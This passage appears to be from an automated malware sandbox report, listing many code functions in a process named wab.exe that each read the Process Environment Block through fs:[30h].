        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22431070 mov eax, dword ptr fs:[00000030h]20_2_22431070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244C073 mov eax, dword ptr fs:[00000030h]20_2_2244C073
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249D070 mov ecx, dword ptr fs:[00000030h]20_2_2249D070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A4000 mov ecx, dword ptr fs:[00000030h]20_2_224A4000
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h]20_2_2243E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h]20_2_2243E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h]20_2_2243E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h]20_2_2243E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241A020 mov eax, dword ptr fs:[00000030h]20_2_2241A020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241C020 mov eax, dword ptr fs:[00000030h]20_2_2241C020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E903E mov eax, dword ptr fs:[00000030h]20_2_224E903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E903E mov eax, dword ptr fs:[00000030h]20_2_224E903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E903E mov eax, dword ptr fs:[00000030h]20_2_224E903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E903E mov eax, dword ptr fs:[00000030h]20_2_224E903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h]20_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249D0C0 mov eax, dword ptr fs:[00000030h]20_2_2249D0C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249D0C0 mov eax, dword ptr fs:[00000030h]20_2_2249D0C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A20DE mov eax, dword ptr fs:[00000030h]20_2_224A20DE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F50D9 mov eax, dword ptr fs:[00000030h]20_2_224F50D9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224490DB mov eax, dword ptr fs:[00000030h]20_2_224490DB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224450E4 mov eax, dword ptr fs:[00000030h]20_2_224450E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224450E4 mov ecx, dword ptr fs:[00000030h]20_2_224450E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241A0E3 mov ecx, dword ptr fs:[00000030h]20_2_2241A0E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A60E0 mov eax, dword ptr fs:[00000030h]20_2_224A60E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224280E9 mov eax, dword ptr fs:[00000030h]20_2_224280E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241C0F0 mov eax, dword ptr fs:[00000030h]20_2_2241C0F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224620F0 mov ecx, dword ptr fs:[00000030h]20_2_224620F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242208A mov eax, dword ptr fs:[00000030h]20_2_2242208A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224AD080 mov eax, dword ptr fs:[00000030h]20_2_224AD080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224AD080 mov eax, dword ptr fs:[00000030h]20_2_224AD080
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241D08D mov eax, dword ptr fs:[00000030h]20_2_2241D08D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22425096 mov eax, dword ptr fs:[00000030h]20_2_22425096
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244D090 mov eax, dword ptr fs:[00000030h]20_2_2244D090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244D090 mov eax, dword ptr fs:[00000030h]20_2_2244D090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245909C mov eax, dword ptr fs:[00000030h]20_2_2245909C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B80A8 mov eax, dword ptr fs:[00000030h]20_2_224B80A8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E60B8 mov eax, dword ptr fs:[00000030h]20_2_224E60B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E60B8 mov ecx, dword ptr fs:[00000030h]20_2_224E60B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419148 mov eax, dword ptr fs:[00000030h]20_2_22419148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419148 mov eax, dword ptr fs:[00000030h]20_2_22419148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419148 mov eax, dword ptr fs:[00000030h]20_2_22419148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419148 mov eax, dword ptr fs:[00000030h]20_2_22419148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h]20_2_224B4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h]20_2_224B4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B4144 mov ecx, dword ptr fs:[00000030h]20_2_224B4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h]20_2_224B4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h]20_2_224B4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22427152 mov eax, dword ptr fs:[00000030h]20_2_22427152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B8158 mov eax, dword ptr fs:[00000030h]20_2_224B8158
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22426154 mov eax, dword ptr fs:[00000030h]20_2_22426154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22426154 mov eax, dword ptr fs:[00000030h]20_2_22426154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241C156 mov eax, dword ptr fs:[00000030h]20_2_2241C156
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F5152 mov eax, dword ptr fs:[00000030h]20_2_224F5152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B9179 mov eax, dword ptr fs:[00000030h]20_2_224B9179
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h]20_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224CA118 mov ecx, dword ptr fs:[00000030h]20_2_224CA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h]20_2_224CA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h]20_2_224CA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h]20_2_224CA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E0115 mov eax, dword ptr fs:[00000030h]20_2_224E0115
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22450124 mov eax, dword ptr fs:[00000030h]20_2_22450124
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22421131 mov eax, dword ptr fs:[00000030h]20_2_22421131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22421131 mov eax, dword ptr fs:[00000030h]20_2_22421131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h]20_2_2241B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h]20_2_2241B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h]20_2_2241B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h]20_2_2241B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F51CB mov eax, dword ptr fs:[00000030h]20_2_224F51CB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E61C3 mov eax, dword ptr fs:[00000030h]20_2_224E61C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E61C3 mov eax, dword ptr fs:[00000030h]20_2_224E61C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245D1D0 mov eax, dword ptr fs:[00000030h]20_2_2245D1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245D1D0 mov ecx, dword ptr fs:[00000030h]20_2_2245D1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h]20_2_2249E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h]20_2_2249E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E1D0 mov ecx, dword ptr fs:[00000030h]20_2_2249E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h]20_2_2249E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h]20_2_2249E1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F61E5 mov eax, dword ptr fs:[00000030h]20_2_224F61E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224451EF mov eax, dword ptr fs:[00000030h]20_2_224451EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224251ED mov eax, dword ptr fs:[00000030h]20_2_224251ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224C71F9 mov esi, dword ptr fs:[00000030h]20_2_224C71F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224501F8 mov eax, dword ptr fs:[00000030h]20_2_224501F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22460185 mov eax, dword ptr fs:[00000030h]20_2_22460185
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DC188 mov eax, dword ptr fs:[00000030h]20_2_224DC188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DC188 mov eax, dword ptr fs:[00000030h]20_2_224DC188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A019F mov eax, dword ptr fs:[00000030h]20_2_224A019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A019F mov eax, dword ptr fs:[00000030h]20_2_224A019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A019F mov eax, dword ptr fs:[00000030h]20_2_224A019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A019F mov eax, dword ptr fs:[00000030h]20_2_224A019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241A197 mov eax, dword ptr fs:[00000030h]20_2_2241A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241A197 mov eax, dword ptr fs:[00000030h]20_2_2241A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241A197 mov eax, dword ptr fs:[00000030h]20_2_2241A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22477190 mov eax, dword ptr fs:[00000030h]20_2_22477190
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h]20_2_224D11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h]20_2_224D11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h]20_2_224D11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h]20_2_224D11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243B1B0 mov eax, dword ptr fs:[00000030h]20_2_2243B1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243C640 mov eax, dword ptr fs:[00000030h]20_2_2243C640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E866E mov eax, dword ptr fs:[00000030h]20_2_224E866E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E866E mov eax, dword ptr fs:[00000030h]20_2_224E866E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245A660 mov eax, dword ptr fs:[00000030h]20_2_2245A660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245A660 mov eax, dword ptr fs:[00000030h]20_2_2245A660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22459660 mov eax, dword ptr fs:[00000030h]20_2_22459660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22459660 mov eax, dword ptr fs:[00000030h]20_2_22459660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22452674 mov eax, dword ptr fs:[00000030h]20_2_22452674
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E609 mov eax, dword ptr fs:[00000030h]20_2_2249E609
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22451607 mov eax, dword ptr fs:[00000030h]20_2_22451607
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245F603 mov eax, dword ptr fs:[00000030h]20_2_2245F603
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243260B mov eax, dword ptr fs:[00000030h]20_2_2243260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243260B mov eax, dword ptr fs:[00000030h]20_2_2243260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243260B mov eax, dword ptr fs:[00000030h]20_2_2243260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243260B mov eax, dword ptr fs:[00000030h]20_2_2243260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243260B mov eax, dword ptr fs:[00000030h]20_2_2243260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243260B mov eax, dword ptr fs:[00000030h]20_2_2243260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243260B mov eax, dword ptr fs:[00000030h]20_2_2243260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22423616 mov eax, dword ptr fs:[00000030h]20_2_22423616
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22423616 mov eax, dword ptr fs:[00000030h]20_2_22423616
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462619 mov eax, dword ptr fs:[00000030h]20_2_22462619
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E627 mov eax, dword ptr fs:[00000030h]20_2_2243E627
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22456620 mov eax, dword ptr fs:[00000030h]20_2_22456620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22458620 mov eax, dword ptr fs:[00000030h]20_2_22458620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h]20_2_2241F626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242262C mov eax, dword ptr fs:[00000030h]20_2_2242262C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F5636 mov eax, dword ptr fs:[00000030h]20_2_224F5636
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h]20_2_2242B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h]20_2_2242B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h]20_2_2242B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h]20_2_2242B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h]20_2_2242B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h]20_2_2242B6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245A6C7 mov ebx, dword ptr fs:[00000030h]20_2_2245A6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245A6C7 mov eax, dword ptr fs:[00000030h]20_2_2245A6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h]20_2_224E16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h]20_2_224E16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h]20_2_224E16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h]20_2_224E16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DF6C7 mov eax, dword ptr fs:[00000030h]20_2_224DF6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224516CF mov eax, dword ptr fs:[00000030h]20_2_224516CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244D6E0 mov eax, dword ptr fs:[00000030h]20_2_2244D6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244D6E0 mov eax, dword ptr fs:[00000030h]20_2_2244D6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h]20_2_224B36EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h]20_2_224B36EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h]20_2_224B36EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h]20_2_224B36EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h]20_2_224B36EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h]20_2_224B36EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224536EF mov eax, dword ptr fs:[00000030h]20_2_224536EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h]20_2_2249E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h]20_2_2249E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h]20_2_2249E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h]20_2_2249E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A06F1 mov eax, dword ptr fs:[00000030h]20_2_224A06F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A06F1 mov eax, dword ptr fs:[00000030h]20_2_224A06F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DD6F0 mov eax, dword ptr fs:[00000030h]20_2_224DD6F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A368C mov eax, dword ptr fs:[00000030h]20_2_224A368C
